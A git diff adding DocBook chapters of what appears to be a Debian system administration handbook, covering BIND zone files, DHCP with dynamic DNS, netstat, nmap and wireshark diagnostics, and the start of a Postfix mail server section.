+      <literal>falcot.com</literal> zone to store information related to
+      this domain, and a <literal>168.192.in-addr.arpa</literal> zone for
+      reverse mapping of IP addresses in the local networks.</para>
+
+      <sidebar>
+        <title><emphasis>CAUTION</emphasis> Names of reverse zones</title>
+        <indexterm><primary>zone</primary><secondary>reverse</secondary></indexterm>
+        <indexterm><primary>reverse zone</primary></indexterm>
+        <indexterm><primary><literal>in-addr.arpa</literal></primary></indexterm>
+        <indexterm><primary><literal>ip6.arpa</literal></primary></indexterm>
+	<indexterm><primary>nibble format</primary></indexterm>
+
+	<para>Reverse zones have a particular name. The zone covering the
+	<literal>192.168.0.0/16</literal> network needs to be named
+	<literal>168.192.in-addr.arpa</literal>: the IP address components
+	are reversed, and followed by the <literal>in-addr.arpa</literal>
+	suffix.</para>
+
+	<para>For IPv6 networks, the suffix is <literal>ip6.arpa</literal> and
+	the IP address components which are reversed are each character in the full
+	hexadecimal representation of the IP address. As such, the
+	<literal>2001:0bc8:31a0::/48</literal> network would use a zone named
+	<literal>0.a.1.3.8.c.b.0.1.0.0.2.ip6.arpa</literal>.</para>
+      </sidebar>
+
+      <sidebar>
+        <title><emphasis>TIP</emphasis> Testing the DNS server</title>
+
+	<para>The <command>host</command> command (in the <emphasis role="pkg">bind9-host</emphasis> package) queries a DNS
+	server, and can be used to test the server configuration. For
+	example, <command>host machine.falcot.com localhost</command>
+	checks the local server's reply for the
+	<literal>machine.falcot.com</literal> query. <command>host
+	<replaceable>ipaddress</replaceable> localhost</command> tests
+	the reverse resolution.</para>
+	<indexterm><primary><command>host</command></primary></indexterm>
+      </sidebar>
+
+      <para>The following configuration excerpts, taken from the Falcot
+      files, can serve as starting points to configure a DNS server:</para>
+      <indexterm><primary><filename>named.conf</filename></primary></indexterm>
+      <indexterm><primary><filename>/etc/bind/named.conf</filename></primary></indexterm>
+
+      <example id="example.bind-named.conf.local">
+        <title>Excerpt of <filename>/etc/bind/named.conf.local</filename></title>
+
+        <programlisting>
+zone "falcot.com" {
+        type master;
+        file "/etc/bind/db.falcot.com";
+        allow-query { any; };
+        allow-transfer {
+                195.20.105.149/32 ; // ns0.xname.org
+                193.23.158.13/32 ; // ns1.xname.org
+        };
+};
+
+zone "internal.falcot.com" {
+        type master;
+        file "/etc/bind/db.internal.falcot.com";
+        allow-query { 192.168.0.0/16; };
+};
+
+zone "168.192.in-addr.arpa" {
+        type master;
+        file "/etc/bind/db.192.168";
+        allow-query { 192.168.0.0/16; };
+};
+</programlisting>
+      </example>
+
+      <example id="example.bind-db.falcot.com">
+        <title>Excerpt of <filename>/etc/bind/db.falcot.com</filename></title>
+
+        <programlisting>; falcot.com Zone 
+; admin.falcot.com. =&gt; zone contact: admin@falcot.com
+$TTL    604800
+@       IN      SOA     falcot.com. admin.falcot.com. (
+                        20040121        ; Serial
+                         604800         ; Refresh
+                          86400         ; Retry
+                        2419200         ; Expire
+                         604800 )       ; Negative Cache TTL
+;
+; The @ refers to the zone name ("falcot.com" here)
+; or to $ORIGIN if that directive has been used
+;
+@       IN      NS      ns
+@       IN      NS      ns0.xname.org.
+
+internal IN      NS      192.168.0.2
+
+@       IN      A       212.94.201.10
+@       IN      MX      5 mail
+@       IN      MX      10 mail2
+
+ns      IN      A       212.94.201.10
+mail    IN      A       212.94.201.10
+mail2   IN      A       212.94.201.11
+www     IN      A       212.94.201.11
+
+dns     IN      CNAME   ns
+</programlisting>
+      </example>
+
+      <sidebar>
+        <title><emphasis>CAUTION</emphasis> Syntax of a name</title>
+
+	<para>The syntax of machine names follows strict rules. For
+	instance, <literal>machine</literal> implies
+	<literal>machine.<replaceable>domain</replaceable></literal>. If
+	the domain name should not be appended to a name, said name must be
+	written as <literal>machine.</literal> (with a dot as suffix).
+	Indicating a DNS name outside the current domain therefore requires
+	a syntax such as <literal>machine.otherdomain.com.</literal> (with
+	the final dot).</para>
+      </sidebar>
+
+      <example id="example.bind-db.192.168">
+        <title>Excerpt of <filename>/etc/bind/db.192.168</filename></title>
+
+        <programlisting>; Reverse zone for 192.168.0.0/16
+; admin.falcot.com. =&gt; zone contact: admin@falcot.com
+$TTL    604800
+@       IN      SOA     ns.internal.falcot.com. admin.falcot.com. (
+                        20040121        ; Serial
+                         604800         ; Refresh
+                          86400         ; Retry
+                        2419200         ; Expire
+                         604800 )       ; Negative Cache TTL
+
+        IN      NS      ns.internal.falcot.com.
+
+; 192.168.0.1 -&gt; arrakis
+1.0     IN      PTR     arrakis.internal.falcot.com.
+; 192.168.0.2 -&gt; neptune
+2.0     IN      PTR     neptune.internal.falcot.com.
+
+; 192.168.3.1 -&gt; pau
+1.3     IN      PTR     pau.internal.falcot.com.
+</programlisting>
+      </example>
+    </section>
+  </section>
+  <section id="sect.dhcp">
+    <title>DHCP</title>
+
+    <para>DHCP (for <emphasis>Dynamic Host Configuration
+    Protocol</emphasis>) is a protocol by which a machine can
+    automatically get its network configuration when it boots. This
+    allows centralizing the management of network configurations, and
+    ensuring that all desktop machines get similar settings.</para>
+    <indexterm><primary>DHCP</primary></indexterm>
+    <indexterm><primary>Dynamic Host Configuration Protocol</primary></indexterm>
+    <indexterm><primary>network</primary><secondary>DHCP configuration</secondary></indexterm>
+
+    <para>A DHCP server provides many network-related parameters. The
+    most common of these is an IP address and the network where the
+    machine belongs, but it can also provide other information, such as
+    DNS servers, WINS servers, NTP servers, and so on.</para>
+
+    <para>The Internet Software Consortium (also involved in developing
+    <command>bind</command>) is the main author of the DHCP server. The
+    matching Debian package is <emphasis role="pkg">isc-dhcp-server</emphasis>.</para>
+
+    <section id="sect.dhcp-config">
+      <title>Configuring</title>
+
+      <para>The first elements that need to be edited in the DHCP server
+      configuration file (<filename>/etc/dhcp/dhcpd.conf</filename>) are
+      the domain name and the DNS servers. If this server is alone on the
+      local network (as defined by the broadcast propagation), the
+      <literal>authoritative</literal> directive must also be enabled (or
+      uncommented). One also needs to create a <literal>subnet</literal>
+      section describing the local network and the configuration
+      information to be provided. The following example fits a
+      <literal>192.168.0.0/24</literal> local network with a router at
+      <literal>192.168.0.1</literal> serving as the gateway. Available IP
+      addresses are in the range <literal>192.168.0.128</literal> to
+      <literal>192.168.0.254</literal>.</para>
+
+      <example id="example.dhcp-dhcpd.conf">
+        <title>Excerpt of <filename>/etc/dhcp/dhcpd.conf</filename></title>
+
+        <programlisting>
+#
+# Sample configuration file for ISC dhcpd for Debian
+#
+
+# The ddns-updates-style parameter controls whether or not the server will
+# attempt to do a DNS update when a lease is confirmed. We default to the
+# behavior of the version 2 packages ('none', since DHCP v2 didn't
+# have support for DDNS.)
+ddns-update-style interim;
+
+# option definitions common to all supported networks...
+option domain-name "internal.falcot.com";
+option domain-name-servers ns.internal.falcot.com;
+
+default-lease-time 600;
+max-lease-time 7200;
+
+# If this DHCP server is the official DHCP server for the local
+# network, the authoritative directive should be uncommented.
+authoritative;
+
+# Use this to send dhcp log messages to a different log file (you also
+# have to hack syslog.conf to complete the redirection).
+log-facility local7;
+
+# My subnet
+subnet 192.168.0.0 netmask 255.255.255.0 {
+    option routers 192.168.0.1;
+    option broadcast-address 192.168.0.255;
+    range 192.168.0.128 192.168.0.254;
+    ddns-domainname "internal.falcot.com";
+}
+</programlisting>
+      </example>
+    </section>
+    <section id="sect.dhcp-dns">
+      <title>DHCP and DNS</title>
+      <indexterm><primary>DNS</primary><secondary>automated updates</secondary></indexterm>
+
+      <para>A nice feature is the automated registering of DHCP clients in
+      the DNS zone, so that each machine gets a significant name (rather
+      than something impersonal such as
+      <literal>machine-192-168-0-131.internal.falcot.com</literal>). Using
+      this feature requires configuring the DNS server to accept updates to
+      the <literal>internal.falcot.com</literal> DNS zone from the DHCP
+      server, and configuring the latter to submit updates for each
+      registration.</para>
+
+      <para>In the <command>bind</command> case, the
+      <literal>allow-update</literal> directive needs to be added to each
+      of the zones that the DHCP server is to edit (the one for the
+      <literal>internal.falcot.com</literal> domain, and the reverse zone).
+      This directive lists the IP addresses allowed to perform these
+      updates; it should therefore contain the possible addresses of the
+      DHCP server (both the local address and the public address, if
+      appropriate).</para>
+
+      <programlisting>
+allow-update { 127.0.0.1 192.168.0.1 212.94.201.10 !any };
+</programlisting>
+
+      <para>Beware! A zone that can be modified <emphasis>will</emphasis>
+      be changed by <command>bind</command>, and the latter will overwrite
+      its configuration files at regular intervals. Since this automated
+      procedure produces files that are less human-readable than
+      manually-written ones, the Falcot administrators handle the
+      <literal>internal.falcot.com</literal> domain with a delegated DNS
+      server; this means the <literal>falcot.com</literal> zone file stays
+      firmly under their manual control.</para>
+
+      <para>The DHCP server configuration excerpt above already includes
+      the directives required for DNS zone updates: they are the
+      <literal>ddns-update-style interim;</literal> and
+      <literal>ddns-domain-name "internal.falcot.com";</literal> lines in
+      the block describing the subnet.</para>
+    </section>
+  </section>
+  <section id="sect.network-diagnosis-tools">
+    <title>Network Diagnosis Tools</title>
+
+    <para>When a network application does not run as expected, it is
+    important to be able to look under the hood. Even when everything seems
+    to run smoothly, running a network diagnosis can help ensure everything
+    is working as it should. Several diagnosis tools exists for this
+    purpose; each one operates on a different level.</para>
+    <section id="sect.netstat">
+      <title>Local Diagnosis: <command>netstat</command></title>
+      <indexterm><primary><command>netstat</command></primary></indexterm>
+
+      <para>Let's first mention the <command>netstat</command> command (in
+      the <emphasis role="pkg">net-tools</emphasis> package); it displays
+      an instant summary of a machine's network activity. When invoked with
+      no argument, this command lists all open connections; this list can
+      be very verbose since it includes many Unix-domain sockets (widely
+      used by daemons) which do not involve the network at all (for
+      example, <literal>dbus</literal> communication,
+      <literal>X11</literal> traffic, and communications between virtual
+      filesystems and the desktop).</para>
+
+      <para>Common invocations therefore use options that alter
+      <command>netstat</command>'s behavior. The most frequently used
+      options include:</para>
+      <itemizedlist>
+        <listitem>
+	  <para><literal>-t</literal>, which filters the results to only
+	  include TCP connections;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>-u</literal>, which works similarly for UDP
+	  connections; these options are not mutually exclusive, and one of
+	  them is enough to stop displaying Unix-domain connections;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>-a</literal>, to also list listening sockets
+	  (waiting for incoming connections);</para>
+        </listitem>
+        <listitem>
+	  <para><literal>-n</literal>, to display the results numerically:
+	  IP addresses (no DNS resolution), port numbers (no aliases as
+	  defined in <filename>/etc/services</filename>) and user ids (no
+	  login names);</para>
+        </listitem>
+        <listitem>
+	  <para><literal>-p</literal>, to list the processes involved; this
+	  option is only useful when <command>netstat</command> is run as
+	  root, since normal users will only see their own
+	  processes;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>-c</literal>, to continuously refresh the list of
+	  connections.</para>
+        </listitem>
+      </itemizedlist>
+
+      <para>Other options, documented in the
+      <citerefentry><refentrytitle>netstat</refentrytitle>
+      <manvolnum>8</manvolnum></citerefentry> manual page, provide an even
+      finer control over the displayed results. In practice, the first five
+      options are so often used together that systems and network
+      administrators practically acquired <command>netstat -tupan</command>
+      as a reflex. Typical results, on a lightly loaded machine, may look
+      like the following:</para>
+
+      <screen role="scale">
+<computeroutput># </computeroutput><userinput>netstat -tupan</userinput>
+<computeroutput>Active Internet connections (servers and established)
+Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
+tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      397/rpcbind     
+tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      431/sshd        
+tcp        0      0 0.0.0.0:36568           0.0.0.0:*               LISTEN      407/rpc.statd   
+tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      762/exim4       
+tcp        0    272 192.168.1.242:22        192.168.1.129:44452     ESTABLISHED 1172/sshd: roland [
+tcp6       0      0 :::111                  :::*                    LISTEN      397/rpcbind     
+tcp6       0      0 :::22                   :::*                    LISTEN      431/sshd        
+tcp6       0      0 ::1:25                  :::*                    LISTEN      762/exim4       
+tcp6       0      0 :::35210                :::*                    LISTEN      407/rpc.statd   
+udp        0      0 0.0.0.0:39376           0.0.0.0:*                           916/dhclient    
+udp        0      0 0.0.0.0:996             0.0.0.0:*                           397/rpcbind     
+udp        0      0 127.0.0.1:1007          0.0.0.0:*                           407/rpc.statd   
+udp        0      0 0.0.0.0:68              0.0.0.0:*                           916/dhclient    
+udp        0      0 0.0.0.0:48720           0.0.0.0:*                           451/avahi-daemon: r
+udp        0      0 0.0.0.0:111             0.0.0.0:*                           397/rpcbind     
+udp        0      0 192.168.1.242:123       0.0.0.0:*                           539/ntpd        
+udp        0      0 127.0.0.1:123           0.0.0.0:*                           539/ntpd        
+udp        0      0 0.0.0.0:123             0.0.0.0:*                           539/ntpd        
+udp        0      0 0.0.0.0:5353            0.0.0.0:*                           451/avahi-daemon: r
+udp        0      0 0.0.0.0:39172           0.0.0.0:*                           407/rpc.statd   
+udp6       0      0 :::996                  :::*                                397/rpcbind     
+udp6       0      0 :::34277                :::*                                407/rpc.statd   
+udp6       0      0 :::54852                :::*                                916/dhclient    
+udp6       0      0 :::111                  :::*                                397/rpcbind     
+udp6       0      0 :::38007                :::*                                451/avahi-daemon: r
+udp6       0      0 fe80::5054:ff:fe99::123 :::*                                539/ntpd        
+udp6       0      0 2001:bc8:3a7e:210:a:123 :::*                                539/ntpd        
+udp6       0      0 2001:bc8:3a7e:210:5:123 :::*                                539/ntpd        
+udp6       0      0 ::1:123                 :::*                                539/ntpd        
+udp6       0      0 :::123                  :::*                                539/ntpd        
+udp6       0      0 :::5353                 :::*                                451/avahi-daemon: r
+</computeroutput></screen>
+
+      <para>As expected, this lists established connections, two SSH
+      connections in this case, and applications waiting for incoming
+      connections (listed as <literal>LISTEN</literal>), notably the Exim4
+      email server listening on port 25.</para>
+    </section>
+    <section id="sect.nmap">
+      <title>Remote Diagnosis: <command>nmap</command></title>
+      <indexterm><primary><command>nmap</command></primary></indexterm>
+
+      <para><command>nmap</command> (in the similarly-named package) is, in
+      a way, the remote equivalent for <command>netstat</command>. It can
+      scan a set of “well-known” ports for one or several remote
+      servers, and list the ports where an application is found to answer
+      to incoming connections. Furthermore, <command>nmap</command> is able
+      to identify some of these applications, sometimes even their version
+      number. The counterpart of this tool is that, since it runs remotely,
+      it cannot provide information on processes or users; however, it can
+      operate on several targets at once.</para>
+
+      <para>A typical <command>nmap</command> invocation only uses the
+      <literal>-A</literal> option (so that <command>nmap</command>
+      attempts to identify the versions of the server software it finds)
+      followed by one or more IP addresses or DNS names of machines to
+      scan. Again, many more options exist to finely control the behavior
+      of <command>nmap</command>; please refer to the documentation in the
+      <citerefentry> <refentrytitle>nmap</refentrytitle>
+      <manvolnum>1</manvolnum> </citerefentry> manual page.</para>
+
+      <screen role="scale" width="80">
+<computeroutput># </computeroutput><userinput>nmap mirtuel</userinput>
+<computeroutput>
+Starting Nmap 6.47 ( http://nmap.org ) at 2015-03-09 16:46 CET
+Nmap scan report for mirtuel (192.168.1.242)
+Host is up (0.000013s latency).
+rDNS record for 192.168.1.242: mirtuel.internal.placard.fr.eu.org
+Not shown: 998 closed ports
+PORT    STATE SERVICE
+22/tcp  open  ssh
+111/tcp open  rpcbind
+
+Nmap done: 1 IP address (1 host up) scanned in 2.41 seconds
+# </computeroutput><userinput>nmap -A localhost</userinput>
+<computeroutput>
+Starting Nmap 6.47 ( http://nmap.org ) at 2015-03-09 16:46 CET
+Nmap scan report for localhost (127.0.0.1)
+Host is up (0.000013s latency).
+Other addresses for localhost (not scanned): 127.0.0.1
+Not shown: 997 closed ports
+PORT    STATE SERVICE VERSION
+22/tcp  open  ssh     OpenSSH 6.7p1 Debian 3 (protocol 2.0)
+|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
+25/tcp  open  smtp    Exim smtpd 4.84
+| smtp-commands: mirtuel Hello localhost [127.0.0.1], SIZE 52428800, 8BITMIME, PIPELINING, HELP, 
+|_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP 
+111/tcp open  rpcbind 2-4 (RPC #100000)
+| rpcinfo: 
+|   program version   port/proto  service
+|   100000  2,3,4        111/tcp  rpcbind
+|   100000  2,3,4        111/udp  rpcbind
+|   100024  1          36568/tcp  status
+|_  100024  1          39172/udp  status
+Device type: general purpose
+Running: Linux 3.X
+OS CPE: cpe:/o:linux:linux_kernel:3
+OS details: Linux 3.7 - 3.15
+Network Distance: 0 hops
+Service Info: Host: mirtuel; OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
+Nmap done: 1 IP address (1 host up) scanned in 11.54 seconds
+</computeroutput>
+</screen>
+
+      <para>As expected, the SSH and Exim4 applications are listed. Note
+      that not all applications listen on all IP addresses; since Exim4 is
+      only accessible on the <literal>lo</literal> loopback interface, it
+      only appears during an analysis of <literal>localhost</literal> and
+      not when scanning <literal>mirtuel</literal> (which maps to the
+      <literal>eth0</literal> interface on the same machine).</para>
+    </section>
+    <section id="sect.sniffers">
+      <title>Sniffers: <command>tcpdump</command> and <command>wireshark</command></title>
+
+      <para>Sometimes, one needs to look at what actually goes on the wire,
+      packet by packet. These cases call for a “frame analyzer”, more
+      widely known as a <emphasis>sniffer</emphasis>. Such a tool observes
+      all the packets that reach a given network interface, and displays
+      them in a user-friendly way.</para>
+      <indexterm><primary><command>tcpdump</command></primary></indexterm>
+
+      <para>The venerable tool in this domain is
+      <command>tcpdump</command>, available as a standard tool on a wide
+      range of platforms. It allows many kinds of network traffic capture,
+      but the representation of this traffic stays rather obscure. We will
+      therefore not describe it in further detail.</para>
+      <indexterm><primary><command>wireshark</command></primary></indexterm>
+
+      <para>A more recent (and more modern) tool,
+      <command>wireshark</command> (in the <emphasis role="pkg">wireshark</emphasis> package), has become the new
+      reference in network traffic analysis due to its many decoding
+      modules that allow for a simplified analysis of the captured packets.
+      The packets are displayed graphically with an organization based on
+      the protocol layers. This allows a user to visualize all protocols
+      involved in a packet. For example, given a packet containing an HTTP
+      request, <command>wireshark</command> displays, separately, the
+      information concerning the physical layer, the Ethernet layer, the IP
+      packet information, the TCP connection parameters, and finally the
+      HTTP request itself.</para>
+
+      <figure id="figure.wireshark">
+        <title>The <command>wireshark</command> network traffic analyzer</title>
+        <mediaobject>
+          <imageobject>
+            <imagedata fileref="images/wireshark.png" scalefit="1" width="75%" />
+          </imageobject>
+        </mediaobject>
+      </figure>
+
+      <para>In our example, the packets traveling over SSH are filtered
+      out (with the <literal>!tcp.port == 22</literal> filter). The packet
+      currently displayed was developed at the HTTP layer.</para>
+
+      <sidebar>
+        <title><emphasis>TIP</emphasis> <command>wireshark</command> with no graphical interface: <command>tshark</command></title>
+        <indexterm><primary><command>tshark</command></primary></indexterm>
+
+	<para>When one cannot run a graphical interface, or does not wish
+	to do so for whatever reason, a text-only version of
+	<command>wireshark</command> also exists under the name
+	<command>tshark</command> (in a separate <emphasis role="pkg">tshark</emphasis> package). Most of the capture and
+	decoding features are still available, but the lack of a graphical
+	interface necessarily limits the interactions with the program
+	(filtering packets after they've been captured, tracking of a given
+	TCP connection, and so on). It can still be used as a first
+	approach. If further manipulations are intended and require the
+	graphical interface, the packets can be saved to a file and this
+	file can be loaded into a graphical <command>wireshark</command>
+	running on another machine.</para>
+      </sidebar>
+    </section>
+  </section>
+</chapter>
diff --git a/tmp/cs-CZ/xml_tmp/11_network-services.xml b/tmp/cs-CZ/xml_tmp/11_network-services.xml
new file mode 100644
index 000000000..c5aac0abd
--- /dev/null
+++ b/tmp/cs-CZ/xml_tmp/11_network-services.xml
@@ -0,0 +1,3448 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="network-services">
+  <chapterinfo>
+    <mediaobject condition="pdf">
+      <imageobject>
+        <imagedata fileref="images/chap-network-services.png" scalefit="1" />
+      </imageobject>
+    </mediaobject>
+    <keywordset>
+      <keyword>Postfix</keyword>
+      <keyword>Apache</keyword>
+      <keyword>NFS</keyword>
+      <keyword>Samba</keyword>
+      <keyword>Squid</keyword>
+      <keyword>OpenLDAP</keyword>
+      <keyword>SIP</keyword>
+    </keywordset>
+  </chapterinfo>
+  <title>Network Services: Postfix, Apache, NFS, Samba, Squid, LDAP, SIP, XMPP, TURN</title>
+  <highlights>
+    <para>Network services are the programs that users interact with
+    directly in their daily work. They are the tip of the information system
+    iceberg, and this chapter focuses on them; the hidden parts they rely
+    on are the infrastructure we already described.</para>
+
+    
+    <para>Many modern network services require encryption technology to
+    operate reliably and securely, especially when used on the public
+    Internet.  X.509 Certificates (which may also be referred to as
+    SSL Certificates or TLS Certificates) are frequently used for this
+    purpose.  A certificate for a specific domain can often be shared
+    between more than one of the services discussed in this chapter.
+    </para>
+    <indexterm><primary>TLS</primary></indexterm>
+    <indexterm><primary>X.509</primary></indexterm>
+    <indexterm><primary>Certificates</primary></indexterm>
+  </highlights>
+  <section id="sect.smtp-mail-server">
+    <title>Mail Server</title>
+
+    <para>The Falcot Corp administrators selected Postfix for the
+    electronic mail server, due to its reliability and its ease of
+    configuration. Indeed, its design enforces that each task is
+    implemented in a process with the minimum set of required permissions,
+    which is a great mitigation measure against security problems.</para>
+    <indexterm><primary>email</primary><secondary>server</secondary></indexterm>
+    <indexterm><primary>mail server</primary></indexterm>
+    <indexterm><primary>Postfix</primary></indexterm>
+
+    <sidebar>
+      <title><emphasis>ALTERNATIVE</emphasis> The Exim4 server</title>
+      <indexterm><primary>Exim</primary></indexterm>
+
+      <para>Debian uses Exim4 as the default email server (which is why the
+      initial installation includes Exim4). The configuration is provided
+      by a separate package, <emphasis role="pkg">exim4-config</emphasis>,
+      and automatically customized based on the answers to a set of Debconf
+      questions very similar to the questions asked by the <emphasis role="pkg">postfix</emphasis> package.</para>
+
+      <para>The configuration can be either in one single file
+      (<filename>/etc/exim4/exim4.conf.template</filename>) or split across
+      a number of configuration snippets stored under
+      <filename>/etc/exim4/conf.d/</filename>. In both cases, the files are
+      used by <command>update-exim4.conf</command> as templates to generate
+      <filename>/var/lib/exim4/config.autogenerated</filename>.
+      The latter is the file used by Exim4. Thanks to this mechanism,
+      values obtained through Exim's debconf configuration — which are stored
+      in <filename>/etc/exim4/update-exim4.conf.conf</filename> — can be
+      injected in Exim's configuration file, even when the administrator or
+      another package has altered the default Exim configuration.</para>
+
+      <para>The Exim4 configuration file syntax has its peculiarities and
+      its learning curve; however, once these peculiarities are understood,
+      Exim4 is a very complete and powerful email server, as evidenced by
+      the tens of pages of documentation.
+      <ulink type="block" url="http://www.exim.org/docs.html" /></para>
+    </sidebar>
+
+    
+    <section>
+      <title>Installing Postfix</title>
+
+      <para>The <emphasis role="pkg">postfix</emphasis> package includes
+      the main SMTP daemon. Other packages (such as <emphasis role="pkg">postfix-ldap</emphasis> and <emphasis role="pkg">postfix-pgsql</emphasis>) add extra functionality to
+      Postfix, including access to mapping databases. You should only
+      install them if you know that you need them.</para>
+
+      <sidebar id="sidebar.smtp">
+        <title><emphasis>BACK TO BASICS</emphasis> SMTP</title>
+        <indexterm><primary>SMTP</primary></indexterm>
+        <indexterm><primary>Simple Mail Transfer Protocol</primary></indexterm>
+        <indexterm><primary>server</primary><secondary>SMTP</secondary></indexterm>
+
+	<para>SMTP (<emphasis>Simple Mail Transfer Protocol</emphasis>) is
+	the protocol used by mail servers to exchange and route
+	emails.</para>
+      </sidebar>
+
+      <para>Several Debconf questions are asked during the installation of
+      the package. The answers allow generating a first version of the
+      <filename>/etc/postfix/main.cf</filename> configuration file.</para>
+
+      <para>The first question deals with the type of setup. Only two of
+      the proposed answers are relevant in case of an Internet-connected
+      server, “Internet site” and “Internet with smarthost”. The
+      former is appropriate for a server that receives incoming email and
+      sends outgoing email directly to its recipients, and is therefore
+      well-adapted to the Falcot Corp case. The latter is appropriate for a
+      server receiving incoming email normally, but that sends outgoing
+      email through an intermediate SMTP server — the “smarthost” —
+      rather than directly to the recipient's server. This is mostly useful
+      for individuals with a dynamic IP address, since many email servers
+      reject messages coming straight from such an IP address. In this
+      case, the smarthost will usually be the ISP's SMTP server, which is
+      always configured to accept email coming from the ISP's customers and
+      forward it appropriately. This setup (with a smarthost) is also
+      relevant for servers that are not permanently connected to the
+      internet, since it avoids having to manage a queue of undeliverable
+      messages that need to be retried later.</para>
+
+      <sidebar>
+        <title><emphasis>VOCABULARY</emphasis> ISP</title>
+        <indexterm><primary>ISP, Internet Service Provider</primary></indexterm>
+
+	<para>ISP is the acronym for “Internet Service Provider”. It
+	covers an entity, often a commercial company, that provides
+	Internet connections and the associated basic services (email, news
+	and so on).</para>
+
+        <para></para>
+      </sidebar>
+
+      <para>The second question deals with the full name of the machine,
+      used to generate email addresses from a local user name; the full
+      name of the machine ends up as the part after the at-sign (“@”).
+      In the case of Falcot, the answer should be
+      <literal>mail.falcot.com</literal>. This is the only question asked
+      by default, but the configuration it leads to is not complete enough
+      for the needs of Falcot, which is why the administrators run
+      <command>dpkg-reconfigure postfix</command> so as to be able to
+      customize more parameters.</para>
+
+      <para>One of the extra questions asks for all the domain names
+      related to this machine. The default list includes its full name as
+      well as a few synonyms for <literal>localhost</literal>, but the main
+      <literal>falcot.com</literal> domain needs to be added by hand. More
+      generally, this question should usually be answered with all the
+      domain names for which this machine should serve as an MX server; in
+      other words, all the domain names for which the DNS says that this machine
+      will accept email. This information ends up in the
+      <literal>mydestination</literal> variable of the main Postfix
+      configuration file — <filename>/etc/postfix/main.cf</filename>.</para>
+      <indexterm><primary>server</primary><secondary>MX</secondary></indexterm>
+      <indexterm><primary>MX</primary><secondary>server</secondary></indexterm>
+
+      <figure>
+        <title>Role of the DNS <emphasis>MX</emphasis> record while sending a mail</title>
+        <mediaobject>
+          <imageobject>
+            <imagedata fileref="images/mail-server.png" scalefit="1" width="60%" />
+          </imageobject>
+        </mediaobject>
+      </figure>
+
+      <sidebar>
+        <title><emphasis>EXTRA</emphasis> Querying the MX records</title>
+
+	<para>When the DNS does not have an MX record for a domain, the
+	email server will try sending the messages to the host itself, by
+	using the matching A record (or AAAA in IPv6).</para>
+      </sidebar>
+
+      <para>In some cases, the installation can also ask what networks
+      should be allowed to send email via the machine. In its default
+      configuration, Postfix only accepts emails coming from the machine
+      itself; the local network will usually be added. The Falcot Corp
+      administrators added <literal>192.168.0.0/16</literal> to the default
+      answer. If the question is not asked, the relevant variable in the
+      configuration file is <literal>mynetworks</literal>, as seen in the
+      example below.</para>
+
+      <para>Local email can also be delivered through
+      <command>procmail</command>. This tool allows users to sort their
+      incoming email according to rules stored in their
+      <filename>~/.procmailrc</filename> file.</para>
+      <indexterm><primary><command>procmail</command></primary></indexterm>
+      <indexterm><primary>email</primary><secondary>filtering</secondary></indexterm>
+      <indexterm><primary>filtering email</primary></indexterm>
+
+      <para>After this first step, the administrators got the following
+      configuration file; it will be used as a starting point for adding
+      some extra functionality in the next sections.</para>
+
+      <example>
+        <title>Initial <filename>/etc/postfix/main.cf</filename> file</title>
+
+        <programlisting>
+# See /usr/share/postfix/main.cf.dist for a commented, more complete version
+
+
+# Debian specific:  Specifying a file name will cause the first
+# line of that file to be used as the name.  The Debian default
+# is /etc/mailname.
+#myorigin = /etc/mailname
+
+smtpd_banner = $myhostname ESMTP $mail_name (Debian/GNU)
+biff = no
+
+# appending .domain is the MUA's job.
+append_dot_mydomain = no
+
+# Uncomment the next line to generate "delayed mail" warnings
+#delay_warning_time = 4h
+
+readme_directory = no
+
+# TLS parameters
+smtpd_tls_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
+smtpd_tls_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
+smtpd_use_tls=yes
+smtpd_tls_session_cache_database = btree:${data_directory}/smtpd_scache
+smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache
+
+# See /usr/share/doc/postfix/TLS_README.gz in the postfix-doc package for
+# information on enabling SSL in the smtp client.
+
+smtpd_relay_restrictions = permit_mynetworks permit_sasl_authenticated defer_unauth_destination
+myhostname = mail.falcot.com
+alias_maps = hash:/etc/aliases
+alias_database = hash:/etc/aliases
+myorigin = /etc/mailname
+mydestination = mail.falcot.com, falcot.com, localhost.localdomain, localhost
+relayhost = 
+mynetworks = 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128 192.168.0.0/16
+mailbox_command = procmail -a "$EXTENSION"
+mailbox_size_limit = 0
+recipient_delimiter = +
+inet_interfaces = all
+inet_protocols = all
+</programlisting>
+      </example>
+      <sidebar>
+        <title><emphasis>SECURITY</emphasis> <emphasis>Snake oil</emphasis> SSL certificates</title>
+
+	<para>The <emphasis>snake oil</emphasis> certificates, like the
+	<emphasis>snake oil</emphasis> “medicine” sold by unscrupulous
+        quacks in old times, have absolutely no value: you cannot rely on
+        them to authenticate the server since they are automatically
+        generated self-signed certificates. However they are useful to
+        improve the privacy of the exchanges.
+        </para>
+        <para>
+        In general they should only be used for testing purposes, and
+        normal service must use real certificates; these can be generated
+        with the procedure described in <xref linkend="sect.easy-rsa" />.
+        </para>
+      </sidebar>
+    </section>
+    <section id="sect.configuring-virtual-domains">
+      <title>Configuring Virtual Domains</title>
+      <indexterm><primary>domain</primary><secondary>virtual</secondary></indexterm>
+      <indexterm><primary>virtual domain</primary></indexterm>
+
+      <para>The mail server can receive emails addressed to other domains
+      besides the main domain; these are then known as virtual domains. In
+      most cases where this happens, the emails are not ultimately destined
+      to local users. Postfix provides two interesting features for
+      handling virtual domains.</para>
+
+      <sidebar>
+        <title><emphasis>CAUTION</emphasis> Virtual domains and canonical domains</title>
+
+	<para>None of the virtual domains must be referenced in the
+	<literal>mydestination</literal> variable; this variable only
+	contains the names of the “canonical” domains directly
+	associated to the machine and its local users.</para>
+      </sidebar>
+      <section>
